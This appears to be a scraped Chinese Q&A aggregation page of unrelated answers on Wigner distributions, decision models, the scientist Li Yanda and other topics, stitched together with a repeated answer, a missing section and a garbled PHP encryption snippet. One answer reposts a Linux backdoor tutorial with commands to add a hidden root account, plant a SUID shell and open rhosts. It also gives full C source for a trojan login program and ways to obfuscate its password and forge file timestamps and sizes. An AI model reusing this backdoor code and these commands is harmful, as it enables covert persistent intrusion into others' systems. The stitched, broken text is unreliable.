A. 如何直觀理解Wigner分布函數
關於時頻工具箱,我倒沒用過。我做數據一般都是用FFT,然後設計濾波演算法。關於你的問題,我查了一下,這邊有一個步驟,供你參考下。詳細步驟:1、x=sig;(也就是你要處理的信號)2、如果信號是實信號,則求其解析信號:y=hilbert(x);3、求其WVD,[tfr,t,f]=tfrwv(y);4、作圖:contour(t,f,tfr),其中f為歸一化頻率,可以乘上信號的采樣頻率的一般還原,看其頻率分布,另外tfr,最好寫成abs(tfr),做出的圖好看。
$key="Thisissupposedtobeasecretkey!!!";
functionkeyED($txt,$encrypt_key)
{
$encrypt_key=md5($encrypt_key);
$ctr=0;
$tmp="";
for($i=0;$i<strlen($txt);$i++){
if($ctr==strlen($encrypt_key))$ctr=0;
$tmp.=substr($txt,$i,1)^substr($encrypt_key,$ctr,1);
$ctr++;
}
return$tmp;
}
functionencrypt($txt,$key)
{
srand((double)microtime()*1000000);
$encrypt_key=md5(rand(0,32000));
$ctr=0;
$tmp="";
for($i=0;$i<strlen($txt);$i++){
if($ctr==strlen($encrypt_key))$ctr=0;
$tmp.=substr($encrypt_key,$ctr,1).
(substr($txt,$i,1)^substr($encrypt_key,$ctr,1));
$ctr++;
}
returnkeyED($tmp,$key);
}
functiondecrypt($txt,$key)
{
$txt=keyED($txt,$key);
$tmp="";
for($i=0;$i<strlen($txt);$i++){
$md5=substr($txt,$i,1);
$i++;
$tmp.=(substr($txt,$i,1)^$md5);
}
return$tmp;
}
$string="HelloWorld!!!";
//encrypt$string,andstoreitin$enc_text
$enc_text=encrypt($string,$key);
//decrypttheencryptedtext$enc_text,andstoreitin$dec_text
$dec_text=decrypt($enc_text,$key);
//加密
functionstr2hex($s)
{
$r="";
$hexes=array("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
for($i=0;$i<strlen($s);$i++)=""$r.=($hexes[(ord($s{$i})>>4)].$hexes[(ord($s{$i})&0xf)]);
return$r;
}
//解密
functionhex2str($s)
{
$r="";
for($i=0;$i<strlen($s);$i=""+="2)"{
$x1=ord($s{$i});
$x1=($x1>=48&&$x1<58)?$x1-48:$x1-97+10;
$x2=ord($s{$i+1});
$x2=($x2>=48&&$x2<58)?$x2-48:$x2-97+10;
$r.=chr((($x1<<4)&0xf0)|($x2&0x0f));
}
return$r;
}
echostr2hex("山東");
echo"
";
echohex2str("c9bdb6ab");
?>
C. 什麼叫傳統理性模型
傳統理性模型俗稱理性決策模型,簡稱理性模型(rational modal)起源於傳統經濟學的理論,傳統經濟學理論是以「經濟人」的假設為前提的,舍棄了一些次要變數,使問題的分析得以簡化,形成有效的分析框架,能用來解釋經濟中的諸多現象。
內容:
1、決策者面臨的是一個既定的問題。
2、決策者選擇決定的各種目的,價值或目標是明確的,而且可以依據不同目標的重要性進行排序。
3、決策者有可供選擇的兩個以上的方案,面對著這些方案,通常在逐一選擇的基礎上,選取其中一個。假如方案基本是相同的,通常會作相同的決定。
4、決策者對同一個問題會面臨著一種或多種自然狀態。它們是不以人們意志為轉移的不可控因素。或者可以說決策者的偏好會隨著時空的變化而變化。
5、決策者會將每一個方案,在不同的自然狀態下的收益值(程度)或損失值(程度)計(估)算出來,經過比較後,按照決策者的價值偏好,選出其中最佳者。
理性決策在實際中必須具備以下基本條件:
1、決策過程中必須獲得全部有效的信息。
2、尋找出與實現目標相關的所有決策方案。
3、能夠准確地預測出每一個方案在不同的客觀條件下所能產生的結果。
4、非常清楚那些直接或間接參與公共政策制定的人們的社會價值偏向及其所佔的相對比重。
5、可以選擇出最優化的決策方案。
分析方法:
1、建立一套完整的操作目標,並賦予權重。
2、准備一套完整的被選方案。
3、建立一套其他價值與資源的完整清單,並賦予權重。
4、對每一方案的成本/效益進行完整預測。
5、對每一方案進行凈期望值計算。
6、 比較各凈期望值,選取期望值最高的方案。
參考網路:http://ke..com/link?url=kBMGW9WVdhw-cn8w_82xY2ifxN5YCzzwbX-JwPqEKvpWCNXGCm2AGmf-gyovFJI9ArJU-o_54y9of7QcwinG9a
D. 李衍達的主要貢獻
李衍達主要從事信號處理理論和地震勘探數據處理方法的研究。在信號重構理論方面,提出了應用幅度譜和部分采樣點重構信號的新定理,使所需的采樣點由N/2減至N/6;提出了利用相位重構技術估計時延的新方法;提出了僅用幅度譜重構最小相位信號的新演算法。與合作者在用不完全投影重建圖像問題上,提出了新的投影關系定理;在將信號處理、模式識別技術應用於地震勘探數據處理方面,提出了利用測井資料提高地震剖面解析度的新方法,以及高解析度速度譜估計方法;與合作者提出了採用POCS圖像復原技術恢復波阻抗剖面的方法;提出了基於零、極點估計的子波估計與反褶積方法;提出了用新的τ-S變換剔除多次波的方法,以及綜合地質、測井、地震資料預測儲層分布等。
李衍達研究的僅用相位譜、幅度譜或附加部分時域采樣點恢復有限長離散信號等問題,在信號重構理論及演算法的研究上達到了國際先進水平。他將新的信號處理與模式識別方法用於地震勘探數據處理,取得了開拓性成果。
李衍達在信號處理理論方法及應用的研究領域也有成就,如利用部分數據重構信號、小波分析、分形信號處理以及這些方法在油氣勘探與開發中的應用。此外,也從事智能信號處理的方法及系統的研究,如人工神經元網路、模糊系統、進化演算法的理論模型及其在信息網路智能控制中的應用,研究了高速網路環境下數據的發掘、提取與多媒體數據的壓縮和組織,以及工業生產過程及設備的智能控制。1997年以來,主要致力於生物信息學的研究,將復雜系統的信息處理和模式識別方法應用在分子生物學中;在基因組序列的信息結構研究,基因調控網路的建模和模擬等方面的研究中也取得了創新性成果。
李衍達曾主持自然科學基金重大項目。先後獲國家自然科學獎、四次獲國家教委科技進步獎(三次一等獎,一次二等獎)、北京市科技進步獎、國家優秀科技圖書獎、電子部優秀教材獎及國家教委優秀教學成果特等獎。 中文
[1] 李衍達.信息世界漫談. 清華大學出版社,2000
[2] 羅發龍,李衍達. 神經網路信號處理. 電子工業出版社,1993
[3] 李衍達, 常同. 信號重構理論及應用. 清華大學出版社,1991
[4] 李梢(博士後),王永炎,季梁,李衍達(導師). 復雜系統意義下的中醫葯學及其案例研究.系統模擬學報,2002, 14(11) :1429-03
[5] 鄒紅星(研究生),戴瓊海,李衍達. FMlet變換的子空間. 中國科學,2001,31:5
[6] 鄒紅星(研究生),戴瓊海,李衍達,盧旭光. 不含交叉項干擾且具有WVD聚集性的時頻分布之不存在性. 中國科學,2001,31,4,348-354
[7] 劉宇新(研究生),李衍達(導師). 基於重疊正交變換的自適應圖像水印. 電子學報,2001,10,1368-1372
[8] 李衍達. 信息與生命. 化學通報,2001,10,601-607
[9] 李衍達. 以信息系統的觀點了解基因組. 電子學報,2001)29:1731-1734
[10] 鄒紅星,王殿軍,戴瓊海,李衍達. 延拓矩陣的奇異值分解. 科學通報,45卷,14期,1560-1562
[11] 李衍達. 與信息科學的結合為生命科學的研究開辟新的前景. 中國科學基金,第13卷,第5期,1999,9,pp,307-308
外文
[1] Xiaowo Wang, Jing Zhang, Fei Li, Jin Gu, Tao He, Xuegong Zhang, and Yanda Li. MicroRNA identification based on sequence and structure alignment. Bioinformatics,15 September 2005; Vol.21, No.18:3610-3614.
[2] Ying Huang and Yanda Li. Prediction of protein subcellular locations using fuzzy k-NN method. . Bioinformatics,Vol.20, No.1, 2004, pp.21-28, DOI:10.1093/bioinformatics/btg366
[3] Qing Zhou and Yanda Li. Directed variation in evolution strategies. IEEE Trans. on Evolutionary Computation, Vol.7, No.4, August 2003
[4] Ji HK, Zhou Q, Wen F, Xia HY, Lu X, Li YD. . AsMamDB: an alternative splice database of mammals . Nucleic Acid Research,2001, 29: 260-263
[5] H。Luo and Y.Li. The application of blind channel identification techniques to prestack seismic deconvolution。(Invited Paper). Proceedings of the IEEE,Vol.86,No.10,Oct.1998
[6] C-B Xiao,X-D Zhang and Y-D Li. A new method for AR order determination of an ARMA process. IEEE Trans.on SP,Vol.44,No.11,Nov.1996
[7] X-D Zhang,Y.Song and Y-D Li. Adaptive identification of nonminimum phase ARMA models using higher order cumulants alone. IEEE Trans.on SP,Vol.44,No.5,pp.1285-1288,May 1996
[8] Li Yanda. Information technological revolution and its impact on China. Computer Application on Petroleum Instry, Vol.2, 1994
[9] X-D Zhang and Y-D Li. Harmonic retrieval in mixed Gaussian and non-Gaussian ARMA noises. IEEE Trans.on Signal Processing,Vol.42, No.12, Dec.1994
[10] Luo Falong, Li Yanda. Real-time computation of the eigenvector corresponding to the smallest eigenvalue of a positive define matrix. IEEE Trans.on Circuit and Systems,Vol.41,No.6,1994
[11] Yen Ta Li,A.L.Kurkjian. Arrival time determination using iterative signal reconstruction from the phase of the cross spectrum.. IEEE Trans. on ASSP, Vol.ASSP-31,No.2. April, 1983
[12] Yanda Li. Improvement of maximum likelihood velocity spectrum estimation. ACTA GEOPHYSICA SINICA, Vol.26, No.2, March, 1983
李衍達共發表《信號重構理論及應用》、《神經網路信號處理》等多部著作及一百餘篇論文。
E. 我要用Matlab做一個離散信號的Wigner分布,調用了tfrwv函數,但做出來的wigner分布不對,求一個示常式序。
關於時頻工具箱,我倒沒用過。我做數據一般都是用FFT,然後設計濾波演算法。
關於你的問題,我查了一下,這邊有一個步驟,供你參考下。
詳細步驟:
1、x=sig;(也就是你要處理的信號)
2、如果信號是實信號,則求其解析信號:y=hilbert(x);
3、求其WVD,[tfr,t,f]=tfrwv(y);
4、作圖:contour(t,f,tfr),其中f為歸一化頻率,可以乘上信號的采樣頻率的一般還原,看其頻率分布,另外tfr ,最好寫成abs(tfr),做出的圖好看。
F. 光暈產品密鑰是什麼
產品密鑰是產品授權的證明,它是根據一定的演算法產生的隨機數。當用戶輸入密鑰產品會根據其輸入的密鑰判斷是否滿足相應的演算法,通過這樣來判斷,以確認用戶的身份和使用許可權。
你聯網看看能不能獲得密鑰,有些品牌電腦預裝的OFFICE 2007是需要聯網才能獲取密鑰的。不過這個密鑰是有使用期限的,一般是90天。
G. WVD交叉項抑制是信號處理中的什麼應用出現的問題
交叉項是因為wvd不滿足變換的線性性質而產生的,從而造成偽峰值,所以在頻譜檢測時要抑制
H. 頒的讀音是什麼
頒 拼音: [bān] 部首:頁部 筆畫:10筆 五筆:WVDM 釋義:1.發下:~發。~布。~賞。~示。~行。2.古同「班」、「斑」,頭發花白。
I. 風險軟體 RootShell
我可以很負責的告訴你,不安全.
它是一個木馬
linux後門技術及實踐
作者:出處:黑客基地責任編輯: 方舟 [ 2005-01-15 15:00 ]入侵者完全控制系統後,為方便下次進入而採用的一種技術
--------------------------------------------------------------------------------
後門簡介
入侵者完全控制系統後,為方便下次進入而採用的一種技術。
一般通過修改系統配置文件和安裝第三方後門工具來實現。 具有隱蔽性,能繞開系統日誌,不易被系統管理員發現等特點。
常用後門技術
增加超級用戶賬號
破解/嗅探用戶密碼
放置SUID Shell
rhosts + +
利用系統服務程序
TCP/UDP/ICMP Shell
Crontab定時任務
共享庫文件
工具包rootkit
可裝載內核模塊(LKM)
增加超級用戶
# echo "e4gle:x:0:0::/:/bin/sh" >> /etc/passwd
# echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
如果系統不允許uid=0的用戶遠程登錄,還需要增加一個普通用戶賬號。
破解/嗅探用戶密碼
獲得shadow文件後,用John the Ripper 工具破解薄弱的用戶密碼。安裝sniffit等嗅探工具,監聽telnet、ftp等埠,收集用戶密碼。
放置SUID Shell
# cp /bin/bash /dev/.rootshell
# chmod u+s /dev/.rootshell
普通用戶在本機運行/dev/.rootshell,即可獲得一個root許可權的shell。
rhosts + +
# echo "+ +" > /.rhosts
# rsh -l root victim.com csh -i
遠程可以得到一個rootshell。
利用系統服務程序
修改/etc/inetd.conf, daytime stream tcp nowait /bin/sh sh -I ;用trojan程序替換in.telnetd、in.rexecd等inted的服務程序
重定向login程序
TCP/UDP/ICMP Shell
BindShell,大部分是基於TCP/UDP協議的網路服務程序,在高埠監聽,很容易被發現。Ping Backdoor,通過ICMP包激活後門,形成一個Shell通道。
TCP ACK數據包後門,能夠穿越防火牆。
Crontab定時任務
通過Crontab程序調度已安裝的後門程序定時運行,一般在深夜時段,是系統管理員不在線的時間。
共享庫文件
在共享庫中嵌入後門函數使用後門口令激活Shell,獲得許可權能夠躲避系統管理員對二進制文件本身的校驗
工具包rootkit
包含一系列系統及後門工具:
- 清除日誌中的登錄記錄
- 偽裝校驗和
- 替換netstat、ps等網路工具
- 後門登錄程序易於安裝和使用
可裝載內核模塊(LKM)
LKM:Loadable Kernel Moles 動態的載入,不需要重新編譯內核。
截獲系統調用,具有隱藏目錄、文件、進程、網路連接等強大功能。
自身隱蔽性好,發現難度較大。
著名的LKM包有adore和knark。
後門的檢測
以自己的經驗,結合特定的工具,手工作一些檢測。
使用Tripwire或md5校驗來檢查系統。
藉助IDS系統,監聽到目標機器的可疑網路連接。
實例:login後門
入侵者先把原始的/bin/login備份,再用一段程序替換/bin/login。入侵者telnet登錄進來的時候,通過環境變數或者終端類型
傳遞了正確的後門密碼,將直接獲得一個Shell;如果是普通用戶登錄,將會重定向到原始的login文件,來處理正常的登錄。
最簡單的login後門ulogin.c源代碼如下:
實例:login後門
#include <stdio.h>
#define PASSWORD "passWORD"
#define _PATH_LOGIN "/sbin/logins"
main (argc, argv, envp)
int argc;
char **argv, **envp;
{
char *display = getenv("DISPLAY");
if ( display == NULL ) {
execve(_PATH_LOGIN, argv, envp);
perror(_PATH_LOGIN);
exit(1);
}
if (!strcmp(display,PASSWORD)) {
system("/bin/csh");
exit(1);
}
execve(_PATH_LOGIN, argv, envp);
exit(1);
}
利用後門登錄
首先Telnet服務是打開的,在自己機器上:
bash$ export DISPLAY=passWORD
bash$ telnet victim.com
Trying xxx.xxx.xxx.xxx...
Connected to victim.com (xxx.xxx.xxx.xxx).
Escape character is '^]'.
% _
strings命令
strings命令能夠列印出二進制文件中的可顯示字元串,用於剛才的ulogin程序:
bash$ strings ulogin
/lib/ld-linux.so.2
..............
DISPLAY
/sbin/logins
passWORD
/bin/csh
加密後門密碼
1,採用DES演算法,即crypt( )函數,編寫gen.c程序:
#include <unistd.h>
main(int argc, char *argv[])
{
if (argc != 3) {
printf("usage: %s <password> <salt>\n", argv[0]);
exit(1);
}
printf("%s\n", crypt(argv[1], argv[2]));
}
2、編譯為gen,執行./gen hack ui,得到的shadow結果為UiVqMWvDrIQjA。
3、修改後門源程序ulogin.c:
-- 以密文形式的密碼代替ulogin.c中define的宏PASSWORD值。
-- 如果後門密碼正確,直接給出Shell:
if (!strcmp(PASSWORD, crypt(display,PASSWORD)))
{
system(SHELL);
exit(1);
}
用strings命令只能看到加密過的密碼。
採用異或(XOR)演算法
以十六進制方式表示字元串,以達到non- printable的效果
1、編碼程序encode.c如下:
char magic[]="\x71\x67\x6d\x7a\x65\x61\x7a";
char *de(char *str,char *key)
{
int i=0,j=0,len;
len=strlen(key);
while(str[i] != '\0') {
str[i]^=key[j];
j++;
if(j==len) j=0;
i++;
}
return str;
}
void display(char *str)
{
int i;
for(i=0;i<strlen(str);i++) printf("\\x%x",str[i]);
printf("\n");
}
main()
{
char gets[100], *ptr;
ptr=gets;
scanf ("%s",ptr);
de(ptr,magic);display(ptr);
}
2、編譯程序encode,依次執行得到關鍵字元串與magic串異或後的結果,例如原始login的文件名/sbin/xlogin,經過異或後為:
\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb
3、在後門源代碼中這樣定義:
Char
login[]="\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb";
然後插入異或函數char *de()結合同一magic串,就能判斷出正確的後門密碼。
用strings命令看不到密碼、路徑等字元串了。
最後的修飾
使後門程序ulogin的strings輸出類似於正常login的strings輸出,做法為:
在ulogin.c代碼中增加一個字元串數組char strings[] ="";,在引號中填入正常login程序的strings輸出結果。
以假亂真,增加迷惑性。
調整後門程序的文件日期、大小等屬性:
1、日期
# ls -l /sbin/xlogin
-r-sr-xr-x root root 19300 Feb 11 1998
/sbin/xlogin
# touch -t 199802110000 ulogin
# _
2、調整大小
# ls -l ulogin /sbin/xlogin
-r-sr-xr-x root root 7542 Feb 11 1998 ulogin
-r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin
# bc
19300-7542
11758
# dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1
1+0 records in
1+0 records out
11758 bytes transferred in 0.000379 secs (31016746
bytes/sec)
# cat /tmp/t >> ulogin
Login後門的檢測
使用命令md5sum對現有/bin/login文件作校驗,與以前的值作比較。
使用Red Hat Linux的RPM校驗:
# rpm -V util-linux
在入侵者已經利用後門登錄的情況下,who是看不到用戶的,查看系統進程,查找login -h xxx.xxx.xxx.xxx的字樣。
--------------------------------------------------------------------------------
J. 幅頻特性曲線有什麼作用
提出了一種測試光電經緯儀幅頻特性曲線以及利用該特性曲線評價伺服控制系統跟蹤性能的方法。論證了利用頻率特性、傳遞函數、微分(或差分)方程描述同一個系統時所具有的等價關系,給出了利用光電經緯儀幅頻特性曲線評價跟蹤性能的意義和優勢。描述了動態靶標連續調頻運動模式下,光電經緯儀跟蹤靶標目標時跟蹤誤差信號的WVD分布。通過分析跟蹤誤差的WVD分布可知跟蹤誤差信號為一系列諧波信號的疊加,因目前缺少准確分離該諧波信號的工具和演算法,導致無法利用時頻分析工具獲取幅頻特性曲線。因此提出採用間接方式利用線性調頻信號測試光電經緯儀幅頻特性曲線。最後給出了利用特性曲線評價光電經緯儀跟蹤伺服系統性能的方法